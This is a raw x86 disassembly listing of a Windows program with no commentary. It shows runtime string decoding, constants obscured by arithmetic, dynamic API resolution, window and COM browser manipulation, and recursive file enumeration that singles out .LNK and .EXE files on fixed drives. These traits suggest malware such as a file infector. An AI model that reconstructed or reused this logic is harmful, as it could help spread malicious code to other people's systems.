add [ebp+var_108], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_43C149
mov eax, dword_44D238
add eax, dword_44D0DC
sub [ebp+var_108], eax
loc_43C149: ; CODE XREF: sub_43BE21+315�j
mov eax, dword_44D1B4
sub eax, 2
add esi, eax
loc_43C153: ; CODE XREF: sub_43BE21+2EF�j
mov eax, dword_44D1B0
movsx edx, word_44D0C4
add eax, edx
cmp esi, eax
jb short loc_43C112
movsx eax, word_44D1C0
mov ebx, eax
add ebx, dword_44D188
sub ebx, 11h
jmp short loc_43C19A
; ---------------------------------------------------------------------------
loc_43C179: ; CODE XREF: sub_43BE21+385�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp+var_108], eax
mov eax, dword_44D198
add eax, dword_44D170
sub eax, 0Ch
add ebx, eax
loc_43C19A: ; CODE XREF: sub_43BE21+356�j
movsx eax, word_44D114
add eax, 7
cmp ebx, eax
jb short loc_43C179
mov eax, [ebp+var_108]
mov ecx, 0Ah
xor edx, edx
div ecx
mov edi, dword_44D1F4
add edi, dword_44D100
sub edi, 0Ah
cmp edx, edi
jnz loc_43CE2F
lea eax, [ebp+var_FF]
push eax
call ds:dword_44C954
pop ecx
or eax, eax
jnz loc_43CE2F
movsx esi, word_44D220
sub esi, 7
movsx esi, word_44D0C4
sub esi, 9
jmp short loc_43C212
; ---------------------------------------------------------------------------
loc_43C1FA: ; CODE XREF: sub_43BE21+401�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp ds:dword_44A540[eax], 0
jz short loc_43C224
inc esi
loc_43C212: ; CODE XREF: sub_43BE21+3D7�j
mov eax, dword_44D118
add eax, 5Ah
add eax, dword_44D104
cmp esi, eax
jb short loc_43C1FA
loc_43C224: ; CODE XREF: sub_43BE21+3EE�j
mov eax, dword_44D188
add eax, 5Bh
cmp esi, eax
jz loc_43CE2F
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:dword_44A540[edx], eax
push offset byte_44E6B1
call sub_43AC82
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call ds:dword_44C814 ; FindWindowExA
mov [ebp+var_134], eax
test eax, eax
jnz short loc_43C27D
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_43C27D: ; CODE XREF: sub_43BE21+451�j
push offset dword_44E6A4
call sub_43AC82
push eax
push [ebp+var_134]
call sub_43BB7B
mov [ebp+var_12C], eax
push offset dword_44E698
call sub_43AC82
push eax
push [ebp+var_12C]
call sub_43BB7B
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:dword_44A544[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push ds:dword_44A544[eax]
call ds:dword_44C838 ; ShowWindow
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call ds:dword_44C830 ; GetWindowRect
push 0
call ds:dword_449598 ; GetModuleHandleA
mov [ebp-10Ch], eax
push offset word_44E68E
call sub_43AC82
add esp, 1Ch
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_12C]
mov edi, [ebp-110h]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, dword_44D1AC
add edi, dword_44D0A4
sub edi, 0Eh
push edi
mov edi, dword_44D1D8
sub edi, 3
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:dword_44A548[ebx], edi
mov edi, dword_44D1B0
mov ebx, [ebp-110h]
sub ebx, [ebp+var_118]
mov edx, dword_44D218
lea edi, [edi+edx+0EAh]
sub ebx, edi
mov edi, dword_44D1B0
add edi, 35h
mov eax, ebx
sub eax, edi
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov edx, dword_44D24C
sub edx, 9
cmp eax, edx
jge short loc_43C3E6
mov eax, dword_44D1CC
movsx edx, word_44D0F8
add eax, edx
dec eax
mov [ebp+var_124], eax
loc_43C3E6: ; CODE XREF: sub_43BE21+5AE�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
mov edx, dword_44D104
add edx, 29h
sub eax, edx
mov [ebp+var_120], eax
push offset dword_44E684
call sub_43AC82
mov [ebp+var_278], eax
push offset byte_44E66B
call sub_43AC82
mov [ebp+var_27C], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push ds:dword_44A548[edi]
movsx edi, word_44D0B4
add edi, 38h
push edi
push [ebp+var_120]
push [ebp+var_124]
mov edi, dword_44D0A8
add edi, 10h
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, dword_44D184
add edi, dword_44D0C8
sub edi, 3
push edi
call ds:dword_44B820 ; CreateWindowExA
mov [ebp+var_138], eax
push offset byte_44E661
call sub_43AC82
mov [ebp+var_284], eax
push offset byte_44E65D
call sub_43AC82
mov [ebp+var_288], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push ds:dword_44A548[edi]
mov edi, dword_44D0B0
add edi, 0F1h
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
movsx ebx, word_44D190
mov edx, dword_44D100
lea ebx, [ebx+edx+30h]
add edi, ebx
mov ebx, dword_44D170
movsx edx, word_44D180
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, dword_44D15C
add edi, 0Eh
add edi, dword_44D1EC
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, dword_44D1A8
add edi, dword_44D0F0
sub edi, 8
push edi
call ds:dword_44B820 ; CreateWindowExA
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44D238
sub eax, 9
push eax
movsx eax, word_44D160
sub eax, 6
push eax
movsx eax, word_44D130
sub eax, 2
push eax
push 2BCh
mov eax, dword_44D1FC
sub eax, 4
push eax
mov eax, dword_44D200
add eax, dword_44D0E0
sub eax, 8
push eax
push dword_44D158
mov eax, dword_44D1C4
add eax, 13h
push eax
call ds:dword_44A214 ; CreateFontA
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call ds:dword_446014 ; SendMessageA
push offset byte_44E653
call sub_43AC82
mov [ebp+var_290], eax
push offset word_44E64E
call sub_43AC82
add esp, 18h
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_13C]
mov edi, dword_44D0B0
mov ebx, dword_44D178
add ebx, 0F4h
add ebx, dword_44D1A4
mov edx, edi
add edx, dword_44D24C
sub edx, 0Eh
sub ebx, edx
push ebx
mov ebx, [ebp+var_120]
mov edx, dword_44D1F8
add edx, edi
mov edi, edx
sub edi, 0Bh
sub ebx, edi
push ebx
movsx edi, word_44D21C
add edi, dword_44D0AC
sub edi, 0Ah
push edi
mov edi, dword_44D0A4
add edi, dword_44D0FC
sub edi, 0Fh
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, dword_44D0D8
movsx ebx, word_44D210
add edi, ebx
sub edi, 0Bh
push edi
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:dword_44A54C[ebx], edi
mov eax, dword_44D178
cmp [ebp+eax+var_104], 34h
jnz short loc_43C6B8
push offset word_44E646
call sub_43AC82
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_445970
jmp short loc_43C6D0
; ---------------------------------------------------------------------------
loc_43C6B8: ; CODE XREF: sub_43BE21+87B�j
push offset dword_44E638
call sub_43AC82
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_445970
loc_43C6D0: ; CODE XREF: sub_43BE21+895�j
push offset word_44E5C6
call sub_43AC82
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call ds:dword_44C810
push offset dword_44E5BC
call sub_43AC82
mov [ebp+var_298], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push ds:dword_44A54C[edi]
movsx edi, word_44D144
add edi, 27h
push edi
push [ebp+var_120]
mov edi, dword_44D218
inc edi
push edi
mov edi, dword_44D158
add edi, 2
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, dword_44D168
add edi, dword_44D10C
sub edi, 9
push edi
call ds:dword_44B820 ; CreateWindowExA
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
movsx eax, word_44D120
add eax, dword_44D0D8
sub eax, 0Eh
push eax
mov eax, dword_44D0CC
mov edx, dword_44D1CC
add edx, eax
sub edx, 7
push edx
movsx edx, word_44D0A0
add edx, eax
mov eax, edx
sub eax, 7
push eax
push 190h
mov eax, dword_44D1AC
add eax, dword_44D15C
sub eax, 5
push eax
mov eax, dword_44D140
add eax, dword_44D10C
sub eax, 9
push eax
movsx eax, word_44D0B8
sub eax, 3
push eax
movsx eax, word_44D110
add eax, 10h
push eax
call ds:dword_44A214 ; CreateFontA
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call ds:dword_446014 ; SendMessageA
push offset dword_44E5B0
call sub_43AC82
mov [ebp+var_2A0], eax
push offset dword_44E5AC
call sub_43AC82
mov [ebp+var_2A4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push ds:dword_44A54C[edi]
mov edi, dword_44D198
add edi, 11Ah
add edi, dword_44D188
push edi
movsx edi, word_44D180
add edi, 2Dh
push edi
movsx edi, word_44D128
add edi, 46h
push edi
movsx edi, word_44D190
add edi, 5
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, dword_44D0A4
sub edi, 9
push edi
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:dword_44A550[ebx], edi
push offset dword_44E5A0
call sub_43AC82
mov [ebp+var_2B0], eax
push offset dword_44E59C
call sub_43AC82
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push ds:dword_44A54C[edi]
mov edi, dword_44D248
add edi, 12Ch
push edi
movsx edi, word_44D220
mov ebx, dword_44D15C
lea edi, [edi+ebx+35h]
push edi
movsx edi, word_44D110
mov ebx, edi
add ebx, 4Bh
push ebx
mov ebx, dword_44D16C
add ebx, 3Fh
add ebx, dword_44D0AC
push ebx
push 50800003h
mov ebx, [ebp+var_2B4]
push ebx
mov ebx, [ebp+var_2B0]
push ebx
add edi, dword_44D178
sub edi, 5
push edi
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:dword_44A554[ebx], edi
mov eax, dword_44D104
sub eax, 3
mov [ebp+var_102], ax
jmp loc_43CA44
; ---------------------------------------------------------------------------
loc_43C988: ; CODE XREF: sub_43BE21+C3D�j
push offset dword_44E594
call sub_43AC82
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_44C810
lea eax, [ebp+var_2C6]
push eax
mov eax, dword_44D1AC
sub eax, 5
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push ds:dword_44A550[eax]
call ds:dword_446014 ; SendMessageA
push offset word_44E58A
call sub_43AC82
movzx edi, [ebp+var_102]
mov ebx, dword_44D238
sub ebx, 3
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_44C810
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
mov eax, dword_44D1BC
movsx edx, word_44D114
add eax, edx
sub eax, 0Ch
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_44A554[eax]
call ds:dword_446014 ; SendMessageA
inc [ebp+var_102]
loc_43CA44: ; CODE XREF: sub_43BE21+B62�j
movzx eax, [ebp+var_102]
movsx edx, word_44D130
mov ecx, dword_44D200
lea edx, [edx+ecx+5]
cmp eax, edx
jl loc_43C988
push offset word_44E582
call sub_43AC82
mov [ebp+var_2C0], eax
push offset word_44E57E
call sub_43AC82
mov [ebp+var_2C4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push ds:dword_44A54C[edi]
movsx edi, word_44D114
add edi, 0Fh
push edi
mov edi, dword_44D1E4
add edi, 54h
push edi
movsx edi, word_44D0B4
mov ebx, dword_44D0F0
lea edi, [edi+ebx+78h]
push edi
mov edi, dword_44D0C8
add edi, 2Dh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:dword_44A558[ebx], edi
movsx eax, word_44D194
movsx edx, word_44D0E8
add eax, edx
sub eax, 0Dh
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_44A558[eax]
call ds:dword_446014 ; SendMessageA
push offset dword_44E574
call sub_43AC82
mov [ebp+var_2D4], eax
push offset word_44E552
call sub_43AC82
mov [ebp+var_2D8], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push ds:dword_44A54C[edi]
mov edi, dword_44D17C
add edi, 36h
add edi, dword_44D1E0
push edi
push [ebp+var_120]
mov edi, dword_44D0CC
add edi, 49h
push edi
mov edi, dword_44D09C
add edi, 95h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
mov edi, dword_44D1A8
sub edi, 8
push edi
call ds:dword_44B820 ; CreateWindowExA
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call ds:dword_446014 ; SendMessageA
push offset dword_44E548
call sub_43AC82
mov [ebp+var_2E0], eax
push offset word_44E52E
call sub_43AC82
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push ds:dword_44A54C[edi]
movsx edi, word_44D220
add edi, 10h
push edi
mov edi, dword_44D1D8
add edi, 94h
movsx ebx, word_44D0B4
add edi, ebx
push edi
mov edi, dword_44D1B4
add edi, 0F6h
mov ebx, dword_44D14C
add ebx, 1Bh
sub edi, ebx
push edi
movsx edi, word_44D114
inc edi
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
movsx edi, word_44D120
movsx ebx, word_44D1B8
add edi, ebx
sub edi, 0Eh
push edi
call ds:dword_44B820 ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:dword_44A55C[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push ds:dword_44A55C[eax]
call ds:dword_446014 ; SendMessageA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push ds:dword_44A550[eax]
call ds:dword_44C7FC ; GetWindowLongA
mov edi, [ebp+var_2F8]
mov ds:dword_44A560[edi], eax
push offset sub_43D8EA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push ds:dword_44A550[eax]
call ds:dword_4495AC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push ds:dword_44A554[eax]
call ds:dword_44C7FC ; GetWindowLongA
mov edi, [ebp+var_304]
mov ds:dword_44A564[edi], eax
push offset sub_43D8EA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push ds:dword_44A554[eax]
call ds:dword_4495AC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push ds:dword_44A558[eax]
call ds:dword_44C7FC ; GetWindowLongA
mov edi, [ebp+var_310]
mov ds:dword_44A568[edi], eax
push offset sub_43D8EA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push ds:dword_44A558[eax]
call ds:dword_4495AC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push ds:dword_44A54C[eax]
call ds:dword_44C7FC ; GetWindowLongA
mov edi, [ebp+var_31C]
mov ds:dword_44A56C[edi], eax
push offset sub_43D8EA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push ds:dword_44A54C[eax]
call ds:dword_4495AC ; SetWindowLongA
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push ds:dword_44A550[eax]
call ds:dword_4499FC ; SetFocus
loc_43CE2F: ; CODE XREF: sub_43BE21+10�j
; sub_43BE21+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43BE21 endp
; =============== S U B R O U T I N E =======================================
sub_43CE34 proc near ; CODE XREF: sub_43A39F+1B�p
push edi
push offset word_44E51E
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D268, eax
test eax, eax
jnz short loc_43CE67
push offset word_44E50E
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D268, eax
loc_43CE67: ; CODE XREF: sub_43CE34+1A�j
push offset dword_44E4FC
call sub_43AC82
push eax
push dword_44D268
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446FF8, eax
push offset byte_44E4EB
call sub_43AC82
push eax
push dword_44D268
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD84, eax
push offset byte_44E4DB
call sub_43AC82
push eax
push dword_44D268
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD94, eax
push offset dword_44E4CC
call sub_43AC82
push eax
push dword_44D268
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446040, eax
push offset dword_44E4BC
call sub_43AC82
add esp, 14h
push eax
push dword_44D268
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A218, eax
pop edi
retn
sub_43CE34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CEF8 proc near ; CODE XREF: sub_43B6DF+4B�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_445950
push ebx
push esi
push edi
cmp dword_44D33C, 0
jnz short loc_43CF25
mov eax, dword_44D0F0
add eax, 0Ah
cmp ds:dword_4495D0, eax
jb loc_43D167
loc_43CF25: ; CODE XREF: sub_43CEF8+17�j
lea eax, [ebp+var_10020]
push eax
call ds:dword_446040
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
movsx eax, word_44D1F0
add eax, dword_44D0C0
sub eax, 6
push eax
push [ebp+arg_0]
call ds:dword_44A218
mov edi, eax
mov eax, dword_44D1E8
add eax, dword_44D1A4
sub eax, 8
cmp edi, eax
jnz loc_43D167
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push offset dword_44ECD4
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, dword_44D1E8
sub eax, 7
cmp edi, eax
jnz loc_43D167
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, dword_44D218
movsx edx, word_44D11C
add eax, edx
sub eax, 0Dh
cmp edi, eax
jnz loc_43D161
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_43B896
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call ds:dword_44CD84
cmp [ebp+var_10003], 68h
jnz short loc_43D025
cmp [ebp+var_10002], 74h
jnz short loc_43D025
cmp [ebp+var_10001], 74h
jnz short loc_43D025
cmp [ebp+var_10000], 70h
jz short loc_43D02A
loc_43D025: ; CODE XREF: sub_43CEF8+110�j
; sub_43CEF8+119�j ...
jmp loc_43D161
; ---------------------------------------------------------------------------
loc_43D02A: ; CODE XREF: sub_43CEF8+12B�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, dword_44D22C
add eax, dword_44D18C
sub eax, 5
cmp edi, eax
jnz loc_43D161
lea eax, [ebp+var_4]
push eax
push offset dword_44EC44
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, dword_44D1F8
sub eax, 6
cmp edi, eax
jnz loc_43D155
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, dword_44D150
sub eax, 2
cmp edi, eax
jnz loc_43D14C
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, dword_44D16C
sub eax, 2
cmp edi, eax
jz short loc_43D0D4
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_43D14C
; ---------------------------------------------------------------------------
loc_43D0D4: ; CODE XREF: sub_43CEF8+1CC�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_43D0E7
xor ebx, ebx
inc ebx
loc_43D0E7: ; CODE XREF: sub_43CEF8+1EA�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_43D14C
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
movsx eax, word_44D220
movsx edx, word_44D128
add eax, edx
sub eax, 0Ch
cmp edi, eax
jnz short loc_43D14C
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_2
push [ebp+var_1002C]
push [ebp+var_4]
push esi
call sub_4425A6
add esp, 14h
loc_43D14C: ; CODE XREF: sub_43CEF8+1A7�j
; sub_43CEF8+1DA�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43D155: ; CODE XREF: sub_43CEF8+182�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43D161: ; CODE XREF: sub_43CEF8+D9�j
; sub_43CEF8:loc_43D025�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_43D167: ; CODE XREF: sub_43CEF8+27�j
; sub_43CEF8+76�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43CEF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D16C proc near ; CODE XREF: sub_43B380+56�p
; sub_43B8E8+3E�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_43D19D
mov eax, dword_44D24C
movsx edx, word_44D220
add eax, edx
sub eax, 10h
mov [ebp+var_248], eax
jmp loc_43D228
; ---------------------------------------------------------------------------
loc_43D19D: ; CODE XREF: sub_43D16C+13�j
mov edx, [ebp+arg_4]
mov ecx, dword_44D1BC
add ecx, dword_44D124
sub ecx, 5
cmp ds:dword_4495E0[edx*4], ecx
jnz short loc_43D1D4
push ebx
call ds:dword_4495BC ; FindClose
mov eax, dword_44D238
add eax, dword_44D0DC
sub eax, 8
push eax
call ds:dword_44C840 ; ExitThread
loc_43D1D4: ; CODE XREF: sub_43D16C+4A�j
mov eax, dword_44D198
add eax, 5Bh
mov [ebp+var_248], eax
push offset dword_44E4B4
call sub_43AC82
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call ds:dword_44C810
add esp, 10h
lea eax, [ebp+var_252]
push eax
call ds:dword_44C844 ; GetDriveTypeA
cmp eax, 3
jnz short loc_43D228
mov eax, dword_44D208
add eax, 122h
add eax, dword_44D104
mov [ebp+var_248], eax
loc_43D228: ; CODE XREF: sub_43D16C+2C�j
; sub_43D16C+A4�j
xor edi, edi
inc edi
push offset byte_44E4AD
call sub_43AC82
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44C810
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43D24C: ; CODE XREF: sub_43D16C+E5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D24C
mov ecx, dword_44D244
add ecx, dword_44D0AC
sub ecx, 9
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43D303
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D275: ; CODE XREF: sub_43D16C+10E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D275
mov ecx, dword_44D154
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 4Ch
jnz short loc_43D303
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D2A1: ; CODE XREF: sub_43D16C+13A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D2A1
mov ecx, dword_44D1C4
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 4Eh
jnz short loc_43D303
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D2CD: ; CODE XREF: sub_43D16C+166�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D2CD
mov ecx, dword_44D0D0
add ecx, 1
add ecx, dword_44D0DC
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 4Bh
jnz short loc_43D303
push esi
call sub_444ACE
add esp, 4
loc_43D303: ; CODE XREF: sub_43D16C+FE�j
; sub_43D16C+12E�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43D308: ; CODE XREF: sub_43D16C+1A1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D308
mov ecx, dword_44D238
sub ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43D3C3
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D32B: ; CODE XREF: sub_43D16C+1C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D32B
movsx ecx, word_44D1F0
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 45h
jnz short loc_43D3C3
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D358: ; CODE XREF: sub_43D16C+1F1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D358
mov edx, eax
mov ecx, dword_44D1D0
movsx eax, word_44D0E8
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 58h
jnz short loc_43D3C3
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43D38D: ; CODE XREF: sub_43D16C+226�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D38D
mov ecx, dword_44D20C
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_446034
add esp, 4
cmp eax, 45h
jnz short loc_43D3C3
push [ebp+var_248]
push esi
call sub_4433F9
add esp, 8
loc_43D3C3: ; CODE XREF: sub_43D16C+1B4�j
; sub_43D16C+1E5�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_44A21C ; FindFirstFileA
mov ebx, eax
mov eax, dword_44D1AC
add eax, dword_44D1D4
sub eax, 9
neg eax
cmp ebx, eax
jz loc_43D4A8
cmp [ebp+var_112], 2Eh
jz loc_43D4A4
push offset dword_44E4A4
call sub_43AC82
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44C810
push [ebp+arg_8]
push [ebp+arg_4]
